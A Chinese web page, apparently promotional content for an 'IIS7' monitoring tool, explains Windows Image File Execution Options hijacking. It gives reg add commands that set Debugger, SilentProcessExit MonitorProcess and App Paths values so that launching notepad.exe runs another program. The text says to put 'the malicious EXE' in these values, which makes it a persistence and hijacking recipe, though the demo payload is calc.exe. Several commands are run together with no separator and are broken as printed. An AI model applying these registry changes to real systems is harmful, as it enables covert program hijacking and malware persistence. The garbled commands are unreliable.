当前位置 主页 > 本站WEB程序 > 安全 > IIS7网站监控 >

最大化 缩小

    图片劫持,图片劫持的玩法

    栏目:IIS7网站监控 时间:2020-11-05 10:44

          劫持对应的程序后,打开该程序运行的是别的程序,运行A.exe打开的则是CALC.exe
     
          放置路径:HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image文件执行选项
     
          用法:在调试路径下创建一个项,项必须要劫持的exe名称,并在创建一个调试器的键值,键值填充运行的恶意EXE。或者在已经创建的项里创建调试器键填入键值,运行那个exe就会被劫持
     
          IIS7服务器监控工具可以做到实时检测网站是否打得开、域名是否被墙、网站是否被劫持,网站被黑、被挂黑链、被挂非法信息。

          下载地址:    IIS7服务器监控工具
     
     
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d C:\Windows\System32\calc.exe
     
          触发路径:
     
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<劫持的exe名称>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\<劫持的exe名称>
     
          劫持notepad.exe示例:
     
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v notepad.exe /t REG_DWORD /d 512reg add   

          "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d C:\Windows\System32\calc.exereg add

          "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
     
          代替映像劫持的注册表路径
     
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\<要劫持的exe名>
     
          Defualt键值要运行的恶意exe路径
    上一篇:判断网站被墙,判断网站被墙的2种方法
    下一篇:网站标题被换名,网站标题被恶意换名的解决办法分享